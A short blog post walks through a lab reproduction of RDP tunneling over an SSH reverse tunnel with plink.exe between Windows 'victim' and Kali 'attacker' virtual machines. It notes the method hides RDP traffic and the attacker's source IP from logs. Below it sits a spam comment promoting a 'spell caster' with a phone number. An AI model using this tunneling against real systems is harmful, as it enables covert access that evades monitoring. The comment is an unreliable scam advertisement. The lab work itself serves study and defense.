Thursday, February 20, 2020

FireEye RDP Tunneling walk-through

setup 2 vms both set to "internal network" in oracle virtualbox
1 vm is windows 10
1 vm is kali linux
ensure they can ping eachother

setup in windows 10 vm
- download plink.exe from putty website

setup in kali linux vm
- edit /etc/ssh/sshd_config to allow root ssh (PermitRootLogin yes)
- restart or start ssh server (systemctl start ssh.service, systemctl restart ssh.service)
- check status of ssh to ensure it's running (systemctl status ssh)

steps to perform rdp tunneling
1.) on windows victim box
     plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:

   (note: this sets up an ssh tunnel from your windows victim box to your linux attacker box , note kaliLinuxIPAddress is replaced with the IP of your attacker box, and root is replaced with whatever account you want to ssh with ... you should see an ssh connection going from the windows box to the attacker box on port 22)

2.) then on the kali linux box
     rdesktop -u VictimAccount


     xfreerdp /u:VictimAccount

     use remmina for RDP and connect to (this is what worked for me best on Windows 10, the others did not appear to be able to support the proper network authentication encryption)

     (note: now you should be brought up a remote desktop session to the victim box from your attacker box, the interesting things is that you won't see any rdp traffic , only the already established ssh connection/tunnel on port 22, also on the victim box you won't see any traffic in the logs from the attacker box, you'll only see source ip of on everything, such as in the remote desktop logs)

1 comment:

  1. I want to thank Dr Emu a very powerful spell caster who help me to bring my husband back to me, few month ago i have a serious problem with my husband, to the extend that he left the house, and he started dating another woman and he stayed with the woman, i tried all i can to bring him back, but all my effort was useless until the day my friend came to my house and i told her every thing that had happened between me and my husband, then she told me of a powerful spell caster who help her when she was in the same problem I then contact Dr Emu and told him every thing and he told me not to worry my self again that my husband will come back to me after he has cast a spell on him, i thought it was a joke, after he had finish casting the spell, he told me that he had just finish casting the spell, to my greatest surprise within 48 hours, my husband really came back begging me to forgive him, if you need his help you can contact him with via email: or add him up on his whatsapp +2347012841542 is willing to help any body that need his help.